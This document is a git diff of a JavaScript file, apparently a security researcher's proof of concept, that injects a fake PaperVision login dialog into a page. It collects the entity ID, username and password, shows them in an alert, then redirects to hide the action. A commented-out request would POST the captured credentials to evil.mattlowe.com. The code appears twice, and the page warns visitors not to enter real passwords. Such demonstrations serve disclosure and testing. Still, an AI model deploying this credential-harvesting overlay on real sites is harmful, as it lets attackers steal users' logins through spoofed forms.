mattlowe · January 2, 2018 12:39
diff --git a/test.js b/test.js

 document.getElementById("mainContent").innerHTML = '<div class="dijitDialog modal" id="loginMenu" widgetid="loginMenu" title="" style="display: block; opacity: 1; left: 650px; top: 356px;"> <div dojoattachpoint="titleBar" class="dijitDialogTitleBar" tabindex="0" wairole="dialog" role="dialog"> <span dojoattachpoint="titleNode" class="dijitDialogTitle"></span> <span dojoattachpoint="closeButtonNode" class="dijitDialogCloseIcon" dojoattachevent="onclick: hide" style="display: none;"> <span dojoattachpoint="closeText" class="closeText">x</span> </span> </div> <div dojoattachpoint="containerNode" class="dijitDialogPaneContent"> <div class="menuBorder"> <div class="menuHeader">Welcome to UBC Jurisdictional Document Database</div> <fieldset class="menuFieldSet"> <legend class="menuLegend">Login Information</legend> <div id="divEntityID" style="display: block;"> <label class="fieldLabel" for="txtEntityID" title="Entity ID (Alt + I)"> Entity <u>I</u>D:</label> <input id="txtEntityID" accesskey="I" autocomplete="off" tabindex="0" value=""><br> </div> <label class="fieldLabel" for="txtUserName" title="User Name (Alt + N)"> User <u>N</u>ame:</label> <input id="txtUserName" accesskey="N" autocomplete="off" tabindex="0" value=""><br> <label class="fieldLabel" for="txtPassword" title="Password (Alt + P)"> <u>P</u>assword:</label> <input id="txtPassword" accesskey="P" autocomplete="off" name="txtPassword" tabindex="0" type="password"><br> <label class="fieldLabel"> Source IP:</label><span class="desc">10.10.1.80</span> </fieldset> <div class="divButtons textAlign-center"> <div class="dijit dijitLeft dijitInline dijitButton dijitButton" dojoattachevent="onclick:_onButtonClick,onmouseenter:_onMouse,onmouseleave:_onMouse,onmousedown:_onMouse" title="Login (Enter)" widgetid="btnLogin"><div class="dijitRight"><input type="submit" class="dijitStretch dijitButtonNode dijitButtonContents" dojoattachpoint="focusNode,titleNode" type="button" wairole="button" waistate="labelledby-btnLogin_label" role="button" aria-labelledby="btnLogin_label" id="btnLogin" tabindex="0" aria-valuenow="" aria-disabled="false"><span class="dijitInline " dojoattachpoint="iconNode"><span class="dijitToggleButtonIconChar">✓</span></span><span class="dijitButtonText" id="btnLogin_label" dojoattachpoint="containerNode"></span></div></div> </div> <fieldset name="name" id="loginInfoFieldSet" class="menuFieldSet"><div class="loginInfo">For System Support or Password Resets,<br>please call Toll Free 1-877-824-9541<br>or Email your request to [email protected]</div></fieldset> <div id="copyrightInfo"><div class="sub1"><img src="https://206.159.179.50/Images/swirl_24x24.png"><a href="javascript:displayHelp(\'About\');" tabindex="-1">Powered by PaperVision<sup>®</sup></a></div><div class="sub2">Copyright <sup>©</sup> 1998-2018 Digitech Systems, Inc. All Rights Reserved.</div><div class="sub2">PaperVision and the PaperVision logo are registered trademarks of <br>Digitech Systems, Inc.</div></div> </div> <p style="color:red; text-align:center">WARNING: This page will steal credentials.<br>DO NOT USE REAL PASSWORDS</p> </div> <span dojoattachpoint="tabEnd" dojoattachevent="onfocus:_cycleFocus" tabindex="0"></span> </div>';
 var lm = document.getElementById("loginMenu");
 lm.style.left = (document.body.clientWidth - lm.clientWidth) / 2 + "px";
 lm.style.top = (document.body.clientHeight - lm.clientHeight - 100) / 2 + "px";
 document.getElementById("btnLogin").addEventListener("click",
 	function (argument) {
 		var data = {};
 		data.entity = document.getElementById("txtEntityID").value
 		data.user = document.getElementById("txtUserName").value
 		data.pass = document.getElementById("txtPassword").value

 		alert("The following data will be posted to an attacker controlled page:" + "\nEntity: " + data.entity + "\nUser: " + data.user + "\nPass: " + data.pass)

 		// var request = new XMLHttpRequest();
 		// request.open('POST', 'https://evil.mattlowe.com/stolendata', false);
 		// request.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded; charset=UTF-8');
 		// request.send(data);

 		alert("Now redirecting to / hide what was done.")
 		document.location = "/";
 	}
 );

	document.getElementById("mainContent").innerHTML = '<div class="dijitDialog modal" id="loginMenu" widgetid="loginMenu" title="" style="display: block; opacity: 1; left: 650px; top: 356px;"> <div dojoattachpoint="titleBar" class="dijitDialogTitleBar" tabindex="0" wairole="dialog" role="dialog"> <span dojoattachpoint="titleNode" class="dijitDialogTitle"></span> <span dojoattachpoint="closeButtonNode" class="dijitDialogCloseIcon" dojoattachevent="onclick: hide" style="display: none;"> <span dojoattachpoint="closeText" class="closeText">x</span> </span> </div> <div dojoattachpoint="containerNode" class="dijitDialogPaneContent"> <div class="menuBorder"> <div class="menuHeader">Welcome to UBC Jurisdictional Document Database</div> <fieldset class="menuFieldSet"> <legend class="menuLegend">Login Information</legend> <div id="divEntityID" style="display: block;"> <label class="fieldLabel" for="txtEntityID" title="Entity ID (Alt + I)"> Entity <u>I</u>D:</label> <input id="txtEntityID" accesskey="I" autocomplete="off" tabindex="0" value=""><br> </div> <label class="fieldLabel" for="txtUserName" title="User Name (Alt + N)"> User <u>N</u>ame:</label> <input id="txtUserName" accesskey="N" autocomplete="off" tabindex="0" value=""><br> <label class="fieldLabel" for="txtPassword" title="Password (Alt + P)"> <u>P</u>assword:</label> <input id="txtPassword" accesskey="P" autocomplete="off" name="txtPassword" tabindex="0" type="password"><br> <label class="fieldLabel"> Source IP:</label><span class="desc">10.10.1.80</span> </fieldset> <div class="divButtons textAlign-center"> <div class="dijit dijitLeft dijitInline dijitButton dijitButton" dojoattachevent="onclick:_onButtonClick,onmouseenter:_onMouse,onmouseleave:_onMouse,onmousedown:_onMouse" title="Login (Enter)" widgetid="btnLogin"><div class="dijitRight"><input type="submit" class="dijitStretch dijitButtonNode dijitButtonContents" dojoattachpoint="focusNode,titleNode" type="button" wairole="button" waistate="labelledby-btnLogin_label" role="button" aria-labelledby="btnLogin_label" id="btnLogin" tabindex="0" aria-valuenow="" aria-disabled="false"><span class="dijitInline " dojoattachpoint="iconNode"><span class="dijitToggleButtonIconChar">✓</span></span><span class="dijitButtonText" id="btnLogin_label" dojoattachpoint="containerNode"></span></div></div> </div> <fieldset name="name" id="loginInfoFieldSet" class="menuFieldSet"><div class="loginInfo">For System Support or Password Resets,<br>please call Toll Free 1-877-824-9541<br>or Email your request to [email protected]</div></fieldset> <div id="copyrightInfo"><div class="sub1"><img src="https://206.159.179.50/Images/swirl_24x24.png"><a href="javascript:displayHelp(\'About\');" tabindex="-1">Powered by PaperVision<sup>®</sup></a></div><div class="sub2">Copyright <sup>©</sup> 1998-2018 Digitech Systems, Inc. All Rights Reserved.</div><div class="sub2">PaperVision and the PaperVision logo are registered trademarks of <br>Digitech Systems, Inc.</div></div> </div> <p style="color:red; text-align:center">WARNING: This page will steal credentials.<br>DO NOT USE REAL PASSWORDS</p> </div> <span dojoattachpoint="tabEnd" dojoattachevent="onfocus:_cycleFocus" tabindex="0"></span> </div>';
	var lm = document.getElementById("loginMenu");
	lm.style.left = (document.body.clientWidth - lm.clientWidth) / 2 + "px";
	lm.style.top = (document.body.clientHeight - lm.clientHeight - 100) / 2 + "px";
	document.getElementById("btnLogin").addEventListener("click",
	function (argument) {
	var data = {};
	data.entity = document.getElementById("txtEntityID").value
	data.user = document.getElementById("txtUserName").value
	data.pass = document.getElementById("txtPassword").value

	alert("The following data will be posted to an attacker controlled page:" + "\nEntity: " + data.entity + "\nUser: " + data.user + "\nPass: " + data.pass)

	// var request = new XMLHttpRequest();
	// request.open('POST', 'https://evil.mattlowe.com/stolendata', false);
	// request.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded; charset=UTF-8');
	// request.send(data);

	alert("Now redirecting to / hide what was done.")
	document.location = "/";
	}
	);